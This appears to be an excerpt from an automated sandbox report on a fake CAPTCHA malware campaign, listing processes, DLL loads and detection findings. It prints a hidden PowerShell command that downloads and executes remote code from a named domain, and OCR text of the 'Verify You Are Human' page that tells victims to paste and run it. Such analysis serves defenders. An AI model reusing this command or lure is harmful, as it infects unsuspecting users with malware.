QB5AEYAegBLAGUAdwBhAEgAcgB4AEkAUQBvAGYATwBEAGUATABiAFkAQwB0AHEATABpAHMAYQBGAE0AYwBRAHoAQwBsAHQAawBkAG0AMwBSADkA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wininet.dll
Source: C:\Windows\System32\mshta.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\mshta.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ieframe.dll
Source: C:\Windows\System32\mshta.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\mshta.exe Section loaded: schannel.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\mshta.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\mshta.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: imgutil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mlang.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Data Obfuscation
barindex
Suspicious powershell command line found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))"
Yara detected Costura Assembly Loader
Source: Yara match File source: 00000014.00000002.2164204062.0000000008540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Persistence and Installation Behavior
barindex
Detect drive by download via clipboard copy & paste
Source: screenshot OCR Text: x e about:blank X Verify You Are Human C escoaterzone.com/play.html Verify You Are Human Please verify that you are a human to continue. I'm not a rabat Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter 15:03 ENG p type here to search SG 15/01/2025
Source: screenshot OCR Text: x e about:blank X Verify You Are Human C escoaterzone.com/play.html Verify You Are Human Please verify that you are a human to continue. I'm not a rabat Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter 15:04 ENG p Type here to search SG 15/01/2025
Source: screenshot OCR Text: x e about:blank X Verify You Are Human escoaterzone.com/play.html Verify You Are Human Please verify that you are a human to continue. I'm not a rabat Undo Cut Copy Verification Paste Steps Select All 1. Press Windows Right to left Reading order Run Button Show Unicode control characters Insert Unicode control character 2. Press CTRL + V Type the resource, open IME 3. Press Enter Reconversion Open: 15:04 ENG p Type here to search SG 15/01/2025
Source: Chrome DOM: 1.1 OCR Text: Verify You Are Human Please verify that you are a human to continue. I'm nat a robat Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter
Source: screenshot OCR Text: x e about:blank X Verify You Are Human escoaterzone.com/play.html Verify You Are Human Please verify that you are a human to continue. I'm not a rabat Verification Steps 1. Press Windows x Run Button 2. Press CTRL + V Type the name of a program, folder, document or Internet resource and Windows will open it for you. 3. Press Enter Q pen: 0K 15:03 ENG p Type here to search SG 15/01/2025
Stores files to the Windows start menu directory
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
